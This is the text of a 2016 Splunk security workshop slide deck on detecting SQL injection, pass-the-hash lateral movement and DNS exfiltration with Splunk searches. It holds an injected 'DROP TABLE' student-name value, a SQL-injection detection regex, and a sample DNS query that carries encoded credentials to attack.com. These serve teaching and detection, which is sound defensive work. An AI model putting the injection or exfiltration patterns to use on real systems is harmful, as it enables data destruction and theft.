Splunk Enterprise for InfoSec Hands-On

1

Aquarius – 01Pisces (A~M)– 02Pisces (N~Z)– 03Aries – 04Taurus (A~M)– 05Taurus (N~Z)– 06Gemini (A~M)– 07

Gemini (N~Z)– 08Cancer (A~M)– 09Cancer (N~Z)– 10Leo– 11Virgo (A~M)– 12Virgo (N~Z)– 13Libra(A~M)– 14

Libra(N~Z)– 15Scorpio (A~M)– 16Scorpio (N~Z)– 17Sagittarius – 18Capricorn (A~M)– 19Capricorn (N~Z)– 20

https://od-splunklivesantaclara-XX.splunkoxygen.comUsername:splunklive Password:security

SecurityHands-On:What’sYourSign?

Copyright©2016SplunkInc.

SplunkEnterpriseforInformationSecurity

Hands-OnSantaClara|November10,2016

Presenters:ChrisShobert &LilyLee

3

SafeHarborStatementDuringthecourseofthispresentation,wemaymakeforward-lookingstatementsregardingfutureeventsortheexpectedperformanceofthecompany.Wecautionyouthatsuchstatementsreflectourcurrentexpectations and estimates basedonfactorscurrentlyknowntousandthatactualeventsorresultscoulddiffermaterially.Forimportantfactorsthatmaycauseactualresultstodifferfromthosecontainedinourforward-lookingstatements,pleasereviewourfilings withtheSEC. Theforward-lookingstatementsmadeinthispresentationarebeingmadeasofthetimeanddateofitslivepresentation. If reviewedafter itslivepresentation, thispresentationmaynotcontaincurrentoraccurateinformation. Wedonotassumeanyobligationtoupdateanyforward-lookingstatementswe may make. Inaddition,anyinformationaboutour roadmapoutlinesourgeneralproductdirectionandissubjecttochangeatanytimewithoutnotice. It isforinformationalpurposesonlyandshallnot beincorporatedintoanycontractorothercommitment. Splunkundertakesnoobligationeithertodevelopthefeaturesorfunctionalitydescribed ortoincludeanysuchfeatureorfunctionalityinafuturerelease.

4

Agenda

Intro

WebAttacks

LateralMovement

DNSExfiltration

Wrap-up/Q&A

Copyright©2016SplunkInc.

Intro

Machinedatacontainsadefinitiverecordofallinteractions

Splunkisaveryeffectiveplatformtocollect,store,andanalyzeallofthatdata

Human Machine

Machine Machine

MainframeData

PlatformforMachineData

SplunkSolutions>EasytoAdopt

RelationalDatabases MobileForwarders Syslog/

TCP/OtherSensors&ControlSystems

AcrossDataSources,UseCases&ConsumptionModels

WireData

SplunkPremiumSolutions&Apps RichEcosystemofApps

VMware Exchange PCISecurity

ITSI

ITSvcInt

UBA

UBA Cisco PAN SNOW AWS

SplunkPositionedasa LeaderinGartner2016MagicQuadrantforSecurityInformationandEventManagement*

*Gartner,Inc.,2016MagicQuadrantforSecurityInformationandEventManagement,andCriticalCapabilitiesforSecurityInformationandEventManagement,OliverRochford,KellyM.Kavanagh,TobyBussa.10August2016ThisgraphicwaspublishedbyGartner,Inc.aspartofalargerresearchdocumentandshouldbeevaluatedinthecontextoftheentiredocument.TheGartnerdocumentisavailableuponrequestfromSplunk.Gartnerdoesnotendorseanyvendor,productorservicedepictedinitsresearchpublications,anddoesnotadvisetechnologyuserstoselectonlythosevendorswith thehighestratingsorotherdesignation.GartnerresearchpublicationsconsistoftheopinionsofGartner'sresearchorganizationandshouldnotbeconstruedasstatementsoffact.Gartnerdisclaimsallwarranties,expressedorimplied, withrespecttothisresearch,includinganywarrantiesofmerchantabilityorfitnessforaparticularpurpose.

Ø Fouryearsinarowasaleader

Ø FurthestoverallinCompletenessofVision

Ø Splunkalsoscoreshighestin2016CriticalCapabilitiesforSIEMreportinallthreeusecases

9

GartnerCriticalCapabilitiesforSIEM

9

*Gartner,Inc.,2016MagicQuadrantforSecurityInformationandEventManagement,andCriticalCapabilitiesforSecurityInformationandEventManagement,OliverRochford,KellyM.Kavanagh,TobyBussa.10August2016ThisgraphicwaspublishedbyGartner,Inc.aspartofalargerresearchdocumentandshouldbeevaluatedinthecontextoftheentiredocument.TheGartnerdocumentisavailableuponrequestfromSplunk.Gartnerdoesnotendorseanyvendor,productorservicedepictedinitsresearchpublications,anddoesnotadvisetechnologyuserstoselectonlythosevendorswith thehighestratingsorotherdesignation.GartnerresearchpublicationsconsistoftheopinionsofGartner'sresearchorganizationandshouldnotbeconstruedasstatementsoffact.Gartnerdisclaimsallwarranties,expressedorimplied, withrespecttothisresearch,includinganywarrantiesofmerchantabilityorfitnessforaparticularpurpose.

1.BasicSecurityMonitoring 2.AdvancedThreatDetection 3.Forensics&IncidentResponse

Copyright©2016SplunkInc.

WebAttacks

11

OWASP2013Top10[10]Unvalidated redirectsandforwards[9]Usingcomponentswithknownvulnerabilities[8]Cross-siterequestforgery[7]Missingfunctionlevelaccesscontrol[6]Sensitivedataexposure[5]Securitymisconfiguration[4]Insecuredirectobjectreference[3]Cross-sitescripting(XSS)[2]Brokenauthenticationandsessionmanagement

12

[1]InjectionSQLinjectionCodeinjectionOScommandingLDAPinjectionXMLinjectionXPath injectionSSIinjectionIMAP/SMTPinjectionBufferoverflow

WhydidIgetbreached?

SQLi hasbeenaroundavery,verylongtime…

13

Source:Imperva WebAttacksReport,2015

14

TalkTalk:PII/financialdatafor4McustomersVTech:PIIfor5Madults+kids

15

…andsofarthisyear…45

16

LittleBobbyTables

17

WhyDidBobby’sSchoolLoseTheirRecords?

$sql = "INSERT INTO Students (Name) VALUES ('" . $studentName . "');";

execute_sql($sql);

$studentName

1

2

18

INSERT INTO Students (Name) VALUES ('John');

WhyDidBobby’sSchoolLoseTheirRecords?

John

$studentName

19

WhyDidBobby’sSchoolLoseTheirRecords?

Robert'); DROP TABLE Students;--

INSERT INTO Students (Name) VALUES ('Robert'); DROP TABLE Students;--');

Let’sgethands-on!

21

Aquarius – 01Pisces (A~M)– 02Pisces (N~Z)– 03Aries – 04Taurus (A~M)– 05Taurus (N~Z)– 06Gemini (A~M)– 07

Gemini (N~Z)– 08Cancer (A~M)– 09Cancer (N~Z)– 10Leo– 11Virgo (A~M)– 12Virgo (N~Z)– 13Libra(A~M)– 14

Libra(N~Z)– 15Scorpio (A~M)– 16Scorpio (N~Z)– 17Sagittarius – 18Capricorn (A~M)– 19Capricorn (N~Z)– 20

https://od-splunklivesantaclara-XX.splunkoxygen.comUsername:splunklive Password:security

SecurityHands-On:What’sYourSign?

22

ALittleAboutOurEnvironmentOurlearningenvironmentconsistsof ~5.5Mevents,fromrealenvironments,butsanitized:

• WindowsSecurityevents• Apachewebaccesslogs• BroDNS&HTTP• PaloAltotrafficlogs• Someothervariousbits

23

OR

AreYouaNewbieorNinja?

Let’sgethands-on!

WebAttacks

25

https://splunkbase.splunk.com/app/1528/

SearchforpossibleSQLinjectioninyourevents:ü looksforpatternsinURIqueryfieldtoseeif

anyonehasinjectedthemwithSQLstatements

ü usestandarddeviationsthatare2.5timesgreaterthantheaveragelengthofyourURIqueryfield

Macrosused• sqlinjection_pattern(sourcetype,uri queryfield)• sqlinjection_stats(sourcetype,uri queryfield)

26

`sqlinjection_rex`isasearchmacro.Itcontains:

(?<injection>(?i)select.*?from|union.*?select|\'$|delete.*?from|update.*?set|alter.*?table|([\%27|\'](%20)*=(%20)*[\%27|\'])|\w*[%27|\']or)

Whichmeans:Inthestringwearegiven,lookforANY ofthefollowingmatchesandputthatintothe“injection”field.AnythingcontainingSELECTfollowedbyFROMAnythingcontainingUNIONfollowedbySELECTAnythingwitha‘attheendAnythingcontainingDELETEfollowedbyFROMAnythingcontainingUPDATEfollowedbySETAnythingcontainingALTERfollowedbyTABLEA%27ORa‘andthena%20andanyamountofcharactersthena%20andthena%27ORa‘

Note:%27isencoded“’”and%20isencoded<space>Anyamountofwordcharactersfollowedbya%27ORa‘andthen“or”

RegularExpressionsFTW

27

Bonus:TryouttheSQLInjectionSearch app!

28

Summary:WebAttacks/SQLInjectionSQLinjectionprovideattackerswitheasyaccesstodataDetectingadvancedSQLinjectionishard– useanapp!UnderstandwhereSQLi ishappeningonyournetworkandputastoptoitAugmentyourWAFwithenterprise-wideSplunksearches

Copyright©2016SplunkInc.

LateralMovement

30

PokingAround

Anattackerhacksanon-privilegedusersystem.

Sowhat?

31

LateralMovement

LateralMovementistheexpansionofsystemscontrolled,anddataaccessed.

32

MostFamousLateralMovementAttack?(excludingpasswordre-use)

PasstheHash!

33

ThisandothertechniquesusedindestructiveSands breach…

…andatSony,too.

34

DetectingLegacyPtHLookforWindowsEvents:EventID:4624or4625Logontype:3Auth package:NTLMUseraccountisnotadomainlogon,orAnonymousLogon

…thisistriviallyeasyinSplunk

Let’sgethands-on!

LateralMovement:Legacy

36

ThenItGotHarderPasstheHashtoolshaveimprovedTrackingofjitter,othermetricsSolet’sdetectlateralmovementdifferently

37

NetworkTrafficProvidesSourceofTruthIusuallytalkto10hostsThenonedayItalkto10,000hostsALARM!

Let’sgethands-on!

LateralMovement:NetworkTraffic

39

iz sohard…uhazmagic?

40

izsohard…uhazmagic?Comesee…

atthedemobooths

UBA

41

Summary:LateralMovementAttackersuccessdefinesscopeofabreachHighdifficulty,highimportanceWorthdoinginSplunkEasywithUBA

Copyright©2016SplunkInc.

DNSExfiltration

43

domain=corp;user=dave;password=12345

encrypt

DNSQuery:ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==.attack.com

ZG9tYWluPWNvcnA7dXNlcj1kYXZlO3Bhc3N3b3JkPTEyMzQ1DQoNCg==

44

DNSexfil tendstobeoverlookedwithinanoceanofDNSdata.

Let’sfixthat!

DNSExfiltration

45

FrameworkPOS:acard-stealingprogramthatexfiltrates datafromthetarget’snetworkbytransmittingitasdomainnamesystem(DNS)traffic

Butthebigdifferenceisthewayhowstolendataisexfiltrated:themalwareusedDNSrequests!https://blog.gdatasoftware.com/2014/10/23942-new-frameworkpos-

variant-exfiltrates-data-via-dns-requests

“”

…feworganizationsactuallykeepdetailedlogsorrecordsof theDNStraffictraversingtheirnetworks— makingitanidealwaytosiphondatafromahackednetwork.

http://krebsonsecurity.com/2015/05/deconstructing-the-2014-sally-beauty-breach/#more-30872

“”

DNSExfiltration

46

https://splunkbase.splunk.com/app/2734/

DNSexfil detection– tricksofthetradeü parseURLs&complicatedTLDs(TopLevelDomain)ü calculateShannonEntropy

Listofprovidedlookups• ut_parse_simple(url)• ut_parse(url,list)orut_parse_extended(url,list)• ut_shannon(word)• ut_countset(word,set)• ut_suites(word,sets)• ut_meaning(word)• ut_bayesian(word)• ut_levenshtein(word1,word2)

47

Examples• Thedomainaaaaa.com hasaShannonEntropyscoreof1.8 (verylow)• Thedomaingoogle.com hasaShannonEntropyscoreof2.6 (ratherlow)• A00wlkj—(-a.aslkn-C.a.2.sk.esasdfasf1111)-890209uC.4.com hasaShannon

Entropyscoreof3 (ratherhigh)

Layman’sdefinition:ascorereflectingtherandomness ormeasureofuncertainty ofastring

ShannonEntropy

48

DetectingDataExfiltration

index=brosourcetype=bro_dns|`ut_parse(query)`|`ut_shannon(ut_subdomain)`|eval sublen =length(ut_subdomain)|tableut_domain ut_subdomainut_shannon sublen

TIPSq LeverageourBroDNSdataq CalculateShannonEntropyscoresq Calculatesubdomainlengthq DisplayDetails

Let’sgethands-on!

LateralMovement:DNSExfiltration

50

DetectingDataExfiltration

…|statscountavg(ut_shannon)asavg_shaavg(sublen)asavg_sublenstdev(sublen)asstdev_sublenbyut_domain|searchavg_sha>3avg_sublen>20stdev_sublen<2

TIPSq LeverageourBroDNSdataq CalculateShannonEntropyscoresq Calculatesubdomainlengthq Displaycount,scores,lengths,

deviations

51

DetectingDataExfiltrationRESULTS• Exfiltrating datarequiresmanyDNSrequests– lookforhighcounts• DNSexfiltrationtomooo.com and chickenkiller.com

52

Summary:DNSExfiltrationExfiltrationbyDNSandICMPisaverycommontechniqueManyorganizationsdonotanalyzeDNSactivity– donotbelikethem!NoDNSlogs?NoSplunk Stream?LookatFWbytecounts

Copyright©2016SplunkInc.

Wrap-up/Q&A

54

SummaryMultiplephasestomodernattacksDeploydetectionacrossallphasesAlsoconsideradaptiveresponse!Stayabreastofmodernadvancements

Today’scontent(PDF):

https://splunk.box.com/v/SplunkLive-Security-Handout

• 5,000+ITandBusinessProfessionals• 175+Sessions• 80+CustomerSpeakers

PLUSSplunk University• Threedays:Sept23-25,2017• GetSplunk CertifiedforFREE!• GetCPEcreditsforCISSP,CAP,SSCP

SEPT25-28,2017WalterE.WashingtonConventionCenterWashington,D.C.CONF.SPLUNK.COM

The8th AnnualSplunkWorldwideUsers’Conference

ThankYou